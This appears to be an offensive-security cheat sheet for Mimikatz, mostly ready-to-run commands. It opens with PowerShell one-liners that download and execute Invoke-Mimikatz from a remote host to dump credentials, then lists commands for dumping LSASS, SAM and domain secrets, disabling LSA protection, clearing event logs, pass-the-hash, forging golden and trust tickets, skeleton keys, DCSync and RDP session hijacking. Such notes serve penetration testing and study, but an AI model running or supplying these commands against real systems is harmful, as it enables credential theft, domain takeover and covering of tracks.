Github Email LinkedIn

Mimikatz Cheat sheet

Loading Mimikatz

Loading the Script in Memory with PS from localhost:

IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.56.1/im.ps1') ; Invoke-Mimikatz -DumpCreds

Loading the Script in Memory with PS from GitHub repo:

IEX (New-Object System.Net.Webclient).DownloadString(β€˜https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1’) ; Invoke-Mimikatz -DumpCreds

Loading the Script in Disk with PS:

Invoke-WebRequest -UseBasicParsing http://192.168.52.200/Tools/Invoke-Mimikatz.ps1 -OutFile Invoke-Mimikatz.ps1 -Verbose

running remotely (on the same powershell session)

Invoke-Mimikatz -Command '"sekurlsa::minidump lsass_612.dmp" "sekurlsa::logonPasswords"'

Commands

bypass memory protections 

privilege::debug
token::elevate

Disable PPL (LSA protection)

PPL protection is controlled by a bit residing in the EPROCESS kernel object associated with the target process. If we could obtain code execution in kernel space, we could disable the LSA protection and dump the credentials..

this can be achieved with Mimikatz since it comes bundled with the mimidrv.sys driver.

We must be local administrator or SYSTEM to dump the credentials, which means we will also have the SeLoadDriverPrivilege privilege and the ability to load any signed drivers. Mimikatz can load the mimidrv.sys driver with the !+ command:

mimikatz # !+

Once the driver is loaded, we can use it to disable the PPL protection for LSASS:

mimikatz # !processprotect /process:lsass.exe /remove

While this technique will disable the LSA Protection it does require that we upload the mimidrv.sys driver to the victim machine, which may trigger antivirus.

LSA PPL is now disabled:

mimikatz # sekurlsa::logonpasswords

List commands in module

Just type in the name of the module followed by :: and press enter

kerberos::
sekurlsa::

Base64 output of commands

base64 /out:true
base64 /out:false

dump the sam file

lsadump::sam
lsadump::sam /patch

Event

drop new event logs in system

event::drop

clear all event logs

event::clear Β 

lsadump

LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.

LSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).

LSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user.

​LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).

sekurlsa

messing with LSA:

# list  LM & NTLM credentials
mimikatz sekurlsa::msv

# Lists WDigest credentials
mimikatz sekurlsa::wdigest

#Β Lists Kerberos credentials
mimikatz sekurlsa::kerberos Β <I've seen this pull plain text passwords>

# Β Lists TsPkg credentials
mimikatz sekurlsa::tspkg

# Lists LiveSSP credentials
mimikatz sekurlsa::livessp

# Lists SSP credentials
mimikatz sekurlsa::ssp

# Β Lists all available providers credentials
mimikatz sekurlsa::logonPasswords

# Switch (or reinit) to LSASS process Β context
mimikatz sekurlsa::process

# Switch (or reinit) to LSASS minidump context
mimikatz sekurlsa::minidump
​
# Antisocial :)
mimikatz sekurlsa::trust

# Preferred Backup Master keys
mimikatz sekurlsa::backupkeys

# Β List Kerberos tickets
mimikatz sekurlsa::tickets

# Β List Kerberos Encryption Keys
mimikatz sekurlsa::ekeys

# Β List Cached MasterKeys
mimikatz sekurlsa::dpapi

# List Credentials Manager
mimikatz sekurlsa::credman

LSADUMP::SAM –> get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.

LSADUMP::Secrets –> get the SysKey to decrypt SECRETS entries (from registry or hives).

LSADUMP::SetNTLM –> Ask a server to set a new password/ntlm for one user.

​LSADUMP::Trust –> Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).

pass the hash

sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

PTH + RDP

sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"

Tokens

show tokens

#list all
token::list

# important tokens
token::list /user:administrator
token::list /user:domainadmin
token::list /user:enterpriseadmin
token::list /user:system\

Run process with a token

token::run /process:cmd.exe

Get / revert those privileges

token::revert
token::elevate

kerberos

KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.
Similar to functionality of β€œklist”.

KERBEROS::PTC – pass the cache (NT6)
*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.

KERBEROS::PTT – pass the ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.
Similar to SEKURLSA::PTH (Pass-The-Hash).
    /filename – the ticket’s filename (can be multiple)
    /diretory – a directory path, all .kirbi files inside will be injected.

KERBEROS::Purge – purge all Kerberos tickets
Similar to functionality of β€œklist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.

KERBEROS::TGT – get current TGT for current user.

golden/silver tickets

kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

skeleton key

MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.
"privilege::debug" "misc::skeleton"

​Trust Ticket​

Once the Active Directory Trust password hash is determined, a trust ticket can be generated. The trust tickets are created using the shared password between 2 Domains that trust each other.

Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, β€œsids”, across trusts in Mimikatz, my β€œcontribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.

# Dumping trust passwords (trust keys)
Mimikatz β€œprivilege::debug” β€œlsadump::trust /patch” exit

# Create a forged trust ticket (inter-realm TGT) using Mimikatz
Mimikatz β€œKerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit


## parameters:

/target – the target domain’s FQDN.

/service – the kerberos service running in the target domain (krbtgt).

/rc4 – the NTLM hash for the service kerberos service account (krbtgt).

/ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.


KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.
Similar to functionality of β€œklist”.

KERBEROS::PTC – pass the cache (NT6)
*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.

KERBEROS::PTT – pass the ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.
Similar to SEKURLSA::PTH (Pass-The-Hash).

/filename – the ticket’s filename (can be multiple)
/diretory – a directory path, all .kirbi files inside will be injected.

KERBEROS::Purge – purge all Kerberos tickets
Similar to functionality of β€œklist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.

KERBEROS::TGT – get current TGT for current user.

DCShadow / DCSync

Set the current machines as DC to have the habitability to create new objects inside the DC (persistent method).

LSADUMP::DCShadow

This requires full AD admin rights or KRBTGT pw hash. DCShadow temporarily sets the computer to be a β€œDC” for the purposes of replication: Creates 2 objects in the AD forest Configuration partition.

ask a DC to synchronize an object (get password data for account) Requires membership in Domain Administrator, domain Administrators, or custom delegation.

LSADUMP::DCSync
Mimikatz β€œlsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit
Mimikatz β€œlsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit


# DCSync Options:

/all – DCSync pull data for the entire domain.

/user – user id or SID of the user you want to pull the data for.

/domain (optional) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.

/csv – export to csv

/dc (optional) – Specify the Domain Controller you want DCSync to connect to and gather data.

NetSync

NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information including the password data.

LSADUMP::NetSync

services

process::stop /pid:1234
process::suspend /pid:1234
process::resume /pid:1234

RDP

# allow multi-session rdp
ts::multirdp
 
# List all current sessions
ts::sessions

# Takeover specified session
ts::remote /id:1

# Pass RDP session into other sessions ID
ts::remote /id:1 /target:2

# Use password of user who owns sessions
ts::remote /id:1 /password:F@ll2019!

Applocker bypass

Misc in mimikatz may be able to launch apps blocked by applocker etc.

misc::cmd
misc::regedit

#  Some kind of filter that can tell if it's running sysmon, kaspersky etc
misc::mflt 

# This will inject into explorer.exe for sneakiness
misc::wp /file:tacos.jpg
PreviousHiveNightmareNextOther Tools / Techniques

Last updated